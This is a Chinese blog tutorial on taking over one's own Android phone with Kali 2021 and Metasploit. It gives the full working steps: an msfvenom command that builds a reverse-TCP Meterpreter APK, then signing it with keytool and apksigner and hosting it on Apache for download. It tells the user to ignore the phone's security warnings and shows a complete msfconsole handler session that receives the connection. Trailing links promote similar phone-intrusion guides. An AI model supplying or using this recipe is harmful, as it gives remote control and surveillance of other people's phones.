Kali 2021:用Metasploit实验入侵自己的安卓手机
要求:电脑主机与手机在同一网段,连接在同一wifi下
方法:在kali的网络适配器下选择桥接模式,选择后输入dhclient重新分发IP,此后就会在同一网段
对于我:kali2021 IP:192.168.1.10 手机IP:192.168.1.7
开始
一.生成apk应用
1,使用msfvenom生成一个预设定向连接kali主机的apk安卓应用。
lhost=192.168.1.10 (这是Kali的IP)lport=4444 (默认4444,可以自定义),chmod使其权限够大
1 | msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.1.10 lport=4444 R > 1.apk
此时已经看到应用。之后我们需要用到的软件有三个,zipalign, keytool , apksigner,对t.apk文件进行优化对齐然后签名
2.使用zipalign对apk进行对齐
1 | apt-get install zipalign
kali默认有keytool,我们自行安装zipalign.
如果出现该报错,只需将你的路径返回至 .apk应用路径。
3,生成密钥对
生成密钥对:
keytool -genkey -v -keystore cg.keystore -alias cg -keyalg RSA -keysize 2048 -validity 10000
解释:
keytool -genkeypair -keystore 密钥库名 -alias 密钥别名 -validity 天数 -keyalg RSA
4.对apk签名
签名:
apksigner sign --ks cg.keystore --ks-key-alias cg 11.apk
解释:
apksigner sign --ks 密钥库名 --ks-key-alias 密钥别名 tz.apk
apt-get install apksigner
5,对apk进行签名验证
apksigner verify -v --print-certs 11.apk
到这里我们已经完成了安卓手机的应用制作(木木)只要把它传到手机里安装就行。忽略所有的安全提示直接安装。
二.手机下载apk
注意:可以先不用下载,在进行完第三步时在下载
方法一:在kali下找到文件发送至好友进行下载即可
方法二:
cp 11.apk /var/www/html
vi /var/www/html/index.html
找到此处,按i进入插入模式添加这一行,然后esc输入:wq保存并退出
这时候手机输入你kali的ip就能访问下载这个apk文件了。
可能出现的问题:
1.访问本机ip失败,显示服务器连接不成功
解决:在kali中开启网络服务: systemctl restart networking
开启apache服务: service apache2 start
若在开启网络服务时报错,建议看下面该作者链接,讲述很全面
https://www.yht7.com/news/152889
三,启动动msfconsole,设置payload监听
- msfconsole
- msf6 > use exploit/multi/handler
- [*] Using configured payload generic/shell_reverse_tcp
- msf6 exploit(multi/handler) > set payload android/meterpreter/reverse_tcp
- payload => android/meterpreter/reverse_tcp
- msf6 exploit(multi/handler) > show options
- Module options (exploit/multi/handler):
- Name Current Setting Required Description
- ---- --------------- -------- -----------
- Payload options (android/meterpreter/reverse_tcp):
- Name Current Setting Required Description
- ---- --------------- -------- -----------
- LHOST yes The listen address (an interface may be specified)
- LPORT 4444 yes The listen port
- Exploit target:
- Id Name
- -- ----
- 0 Wildcard Target
- msf6 exploit(multi/handler) > set LHOST 192.168.1.10
- LHOST => 192.168.1.10
- msf6 exploit(multi/handler) > exploit
到这里,手机那边安装好11.apk之后并打开,这边kali就自动连接上了。
Kali 2021:用Metasploit实验入侵自己的安卓手机相关推荐
- kali linux入侵安卓7.0,【教程】metasploit入侵安卓手机
metasploit入侵安卓手机拿shell KALI IP: 192.168.194.128 1.生成木马文件 msfvenom -p android/meterpreter/reverse_tcp ...
- Kali Linux利用MSF入侵安卓手机(小白版超详细)
Kali Linux利用MSF入侵安卓手机 一.什么是msf 演示环境 二.渗透流程 1.进入管理员模式 2.生成可执行木马文件 3.运行msfconsole命令 4.配置参数 5.在靶机打开可执行文 ...
- Kali Linux利用MSF入侵安卓手机(零基础版超详细)
Kali Linux利用MSF入侵安卓手机 文章目录 Kali Linux利用MSF入侵安卓手机 一.什么是msf 演示环境 二.渗透流程 1.进入管理员模式 2.生成可执行木马文件 3.运行msfc ...
- Metasploit实验:android内网的反弹控制
一.测试环境: 实验环境:kali下Metasploit,kali无线网络环境1(外网180.91.xx.xx,内网:192.168.0.XX): 安卓手机:oppo R17.无线网络环境2(外网18 ...
- Metasploit实验
1.实验 Metasploit 2.实验环境 本实验需准备: 1)Kali虚拟机 2)Windows虚拟机 3)Centos/Ubuntu虚拟机 3.实验需求 1)将渗透主机KALI,Windows与 ...
- Kali利用MSF入侵安卓手机
kali利用MSF入侵安卓手机 一.什么是MSF 二.演示环境 三.渗透过程 1.使用root权限 2.生成可执行木马文件 3.将生成的后门文件,放入靶机 4. 运行msfconsole命令 5.参数 ...
- 合肥工业大学2021离散数学上机实验一
实验一:逻辑运算表示与验证 实验目的和要求 实验目的:理解命题逻辑相关运算,增强逻辑推理能力 实验要求: (1).从键盘输入命题常元的真值求他们的合取.析取.求反.异或.单条件. 双条件以及命题表达式 ...
- kali 2021安装w3af
折腾了一晚上,终于装上了w3af. kali 2020依赖安装出现了问题,可能是循环依赖的原因,具体是有关texlive-base的依赖. 不管了,切换到kali 2021,安装 docker 版的 ...
- 哈工大2021软件构造实验3心得(1)-进行GUI设计
哈工大2021软件构造实验3心得(1)-进行GUI设计 最近,笔者完成下窝工的软构实验三.在完成过程中,有很多坑想要记录一下. 顺便方便一下后来的窝工学子. 此Blog主要讨论如何在Eclipse里面 ...
最新文章
- 解决.NET 4.0下无法直接运行.NET 2.0程序的问题
- 如何衡量机器与人类的智能关系,AI智商评测标准专家研讨会邀请
- Java实现算法导论中Pollard的rho启发式方法
- 使用工具Source Monitor测量您Java代码的环复杂度
- centos7.3 mysql5.7_CentOS7.3 yum install MySQL5.7
- 【编撰】Directfb 深入 001 初始化简介 01
- VB.NET工作笔记004---认识wsf文件
- mysql 存储过程实际应用,mysql 存储过程应用实例
- [转载] Linux进程状态解析之R、S、D、T、Z、X
- android studio创建和安装虚拟机
- linux之atoi,atol,atoll,atof
- ubuntu20.04显卡驱动3分钟安装方法
- 思岚激光雷达A2 Ros配置
- 华北理工大学计算机考研怎么样,华北理工大学考研难吗
- Oracle自定义函数实现动态参数复制表(使用了自定义type以及pipelined)
- 专用计算机房属于中危险等级,普通住宅属哪种危险等级的灭火器配置场所
- python杂学之用turtle画熊二(附代码)
- 什么是端口映射?本文详尽解析!
- 解密android日志xlog,mars的xlog日志文件解析以及日志查看工具介绍
- proteus软件闪退与许可证到期问题解决办法
热门文章
- 【短视频运营】短视频变现方式 ( 直播打赏 | 线上引流 | 电商带货 | 知识变现 | 品牌推广 | 粉丝数量 | 粉丝领域 | 粉丝质量 )
- 计算机试题新编实训,计算机实训报告.doc
- sql语句查询到上周、上个月的数据
- linux驱动程序ioctl函数用法
- 通关算法题之 ⌈字符串⌋
- MySql数据库允许外网访问连接
- 多账户统一登录,如何设计用户体系?
- 串口调试助手 ubuntu桌面版
- 手眼标定(python、realsense、jaka);四元素、欧拉角、旋转矢量到旋转矩阵转换
- 三层交换机上配置Trunk并接口为802.1q